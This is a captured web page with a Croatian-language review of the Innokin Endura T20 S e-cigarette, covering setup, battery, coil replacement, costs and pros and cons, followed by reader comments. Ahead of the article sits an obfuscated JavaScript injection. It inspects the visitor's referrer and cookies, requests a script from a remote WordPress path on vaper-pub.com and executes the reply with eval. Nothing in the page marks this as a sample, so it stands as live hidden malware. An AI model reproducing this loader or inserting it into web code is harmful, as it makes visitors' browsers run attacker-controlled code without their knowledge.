;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}
Innokin Endura T20 S

Innokin Endura T20 S review

Nakon recenzija POD uređaja Wiip i Veev odlučili smo se zakoračiti u one standardnije uređaje, AIO “all in one” sisteme kao što je Innokin Endura.

Innokin Endura T20 S je poprilično star uređaj, dostupan na tržištu nekoliko godina, isprobano pouzdan i prihvaćen od strane korisnika koji tek ulaze u svijet e cigareta.

Kako bi vam bilo lakše pratiti članak evo par kratkih pojmova koji se nalaze u članku:
POD uređaji – elektronske cigarete najčešćeg oblika kao pločica
Atomizer / tank – dio e cigarete koji sadržava grijači element i e tekućinu
POD/patrona – atomizer za POD uređaje
Grijač – grijači element koji služi za funkciju isparavanja e tekućine
MTL – mouth to lung način parenja gdje uvlačite paru prvo u usta a onda u pluća
RDL – restricted direct lung način parenja gdje uvlačite direktno u pluća no e cigareta pruža otpor prilikom uvlačenja

Po čemu se Innokin Endura razlikuje od POD uređaja

Innokin Endura
Innokin Endura

Innokin Endura kao AIO uređaj u startu izgleda drugačije od POD “pločica” kao što smo to vidjeli kod Wiipa i Veeva.
Ima integriranu bateriju jačeg kapaciteta od prethodno navedenih POD uređaja – kod ovog uređaja baterija će potrajati gotovo cijeli dan.
Sam uređaj je nešto veći no ne pretjerano velik i nezgrapan.

Tank (atomizer) je odvojiv od baterije. To je praktično prvenstveno iz razloga što ako slučajno uređaj padne i tank pukne – možete ga zamijeniti.

Sama generacija pare (koliko uređaj daje pare) i okus je daleko bolji nego u oba prethodno navedena uređaja. To isključivo stvar tehnologije – ne obavezno kvalitete izrade. Moramo napomenuti da Wiip ima izrazito dobru generaciju pare s obzirom da je tako mali uređaj. No to se ne može usporediti s ovom vrstom uređaja gdje je coil puno veći.

Još jedna bitna razlika spram Wiipa i Veeva je činjenica da e tekućinu nadopunjete sami. Bočica od 120 ml e tekućine je financijski daleko isplativija nego zasebno kupljene partrone bez dodatnih komplikacija.

Sama cijena uređaja se gotovo ne razlikuje od prethodno testiranih. Innokin Endura košta 219 kn u trgovini.

Innokin Endura i njezina jednostavnost

Nema tu previše filozofije.

Kutija je jednostavna, u njoj dobivate e cigaretu spremnu za korištenje, rezervni grijač i zamjenski gornji dio (usnik, driptip) koji možete ili ne morate mijenjati. Uređaj se može napuniti i koristiti out of the box.

Sadržaj kutije
Sadržaj kutije

Uređaj izvadite, odvrnete plastični dio usnika, napunite e tekućinom, zatvorite i pričekate 10-15 minuta – pustite da se grijač natopi.

To čekanje je potrebno samo prilikom prvog punjenja e cigarete, ne i za nadopunjavanje.

Nakon što je prošlo 15 minuta, upalite uređaj pritiskom power gumba 3 puta. I to je to.

Kakav je ugođaj korištenja Innokin Endure?

Uređaj je lagan, kompaktan. Poprilično je malih dimenzija.

Pritiskom na power gumb grijač počne grijati – vi uvučete paru i to je to.

Uređaj se gasi sam od sebe nakon nekoliko desetaka minuta ne korištenja.

Kod ovakvih uređaja potrebno je samo obratiti pozornost da ga ugasite prije spremanja u džep ili torbu kako ne bi došlo do slučajne aktivacije.

Uređaj ima overheat protection gdje ukoliko se i desi to da se slučajno “klikne” na gumb za paljenje – e cigareta će se sama ugasiti nakon desetak sekundi.

Generacija pare je očekivano bolja nego što je bila kod POD uređaja. Para je toplija a i u njemu nemate ograničenja oko vrste tekućina. Stoga možete staviti gušće tekućine s više biljnog glicerola u stastvu kako bi para bila teža i punija. S druge strane ako koristite e tekućine s više propilen glikola para će biti “rijeđa” no intenzivnija okusom i intenzivniji osječaj u grlu (throat hit).

Kada je baterija uređaja pri kraju na power gumbu će početi svjetliti crveno svjetlo. U toj fazi imate još desetak minuta korištenja. Nakon toga se uređaj ugasi odnosno pritiskom na gumb blinka crveno te ga morate staviti na punjač. Puni se putem standardnog mini USB utora. Prilikom punjenja konstantno gori crveno svjetlo.

Ako netkom nešto znači inforamcija – može se koristiti dok je na punjaču. Dakle iako je uređaj bio prazan, nakon priključivanja na punjać može se koristiti, ukoliko je to krajnje potrebno.

Zamjena grijača Innokin Endure

Zamjena grijača e cigarete Innokin Endure je kao zamjena podova/spremnika/patrona kod POD-ova. Tamo mijenjate cijeli “atomizer” – tu mijenjate samo grijač.

Innokin endura atomizer
Innokin endura atomizer

Jedno od najčešćih pitanja novih vapera je “kada mijenjati grijač“? Za detalje pročitajte linkani članak, no ukratko:
– ako osjetite da se okus e tekućine promjenio
– ako primijetite da e cigareta više ne generira toliko pare kao prije

To može biti nakon 3, 10, 15 dana. Ovisno o e tekućini koju parite. Zašto se grijači e cigareta prljaju pročitajte klikom na link.

Zamjena grijača je krajnje jednostavna. Odvrnete donji dio tanka, izvadite stari coil i umetnete novi.

Jedino na što morate pripaziti je da metalni profil grijača sjedne u za to predviđeni profil na atomizeru, kako je na slici ispod.

Umetanje grijača Innokin endura
Umetanje grijača Innokin endura

Zaključak

Innokin Endura je solidan uređaj za početnike izuzetno prihvatljive cijene.

Ovaj uređaj možemo bez problema biti privremena zamjena naprednijim korisnicima.

Prednosti:
– male dimenzije, kompaktan, lagan
– baterija koja traje puno duže
– odvojiv atomizer – ukoliko pukne lako kupite novi
– lako se puni odozgo
– lako se mijenja grijač
– povoljnija opcija – cijena uređaja je 220 kn u trenutku pisanja članka u trgovini cigarete.hr
– mjesečni izdaci bi bili – 2 coila, 120ml e tekućine = od prilike 160 kn mjesečno (što je duplo manje nego za Veev i četiri puta manje nego za Wiip)

Nedostaci:
– nije čisti MTL, više je RDL
– nemogućnost regulacije protoka zraka

Choose your Reaction!
 • Endura T20S, evo je jedna takva leži u ambalaži tu kod mene doma, poklon od frenda Jimmyja, nažalost neispravna.
  Otišao je konektor za punjenje baterije, a tank sam dao frendu pa ga je koristio na nekom malom modu sa 510 navojem i tank je čisto ok, daje solidnu količinu pare.

  Još jedna OK recenzija, kao što smo i navikli :)

 • Dobar posao oko recenzije Endure…
  Ali, ja ne bih bio ja ako ne navedem što nedostaje za razliku od recenzija viipa i veeva, a to je: osjećaj parenja, čisto neka referenca na sami okus tekućine, dobar, loš, zao, fino, prazno, iskrivljeno…
  Hladno nabrajanje činjenica nam ne pomaže da pokupimo vibru samog uređaja, valja li ili ne valja? Bi li predložili to kao starter nekome ili mislite da ima boljih, bla bla..??
  JA sam upoznat s Endurom, pa za mene je ovo odličan revju, no, netko tko se susreće s tim po prvi puta i eventualno razmišlja o kupovini bi mogao biti zakinut za poneki detalj i dojam koji mogao prevagnuti u kupiti ili ne kupiti…
  JA ću nadodati ovo: dobar je, bez daljnjeg, ali je zastario, danas ima boljih u tom cjenovnom rangu, poput geekvapeovog g18 ili innokinovog sceptrea (samo primjeri)..
  Hoćete li pogriješiti kupovinom ovog? Ne, za netkoga tko se skida s pljugi ovo je dobar primjer nečega što daje solidnu aromu i dobru količinu pare..
  Uglavnom, bravo Hrvoje, uživam čitati i gledati vaše recenzije i sorry na ovom osvrtu…
  :)

  • Imaš pravo al zato postoje komentari :) i mišljenja vas ostalih jer nije samo moje mišljenje važno

Leave a Comment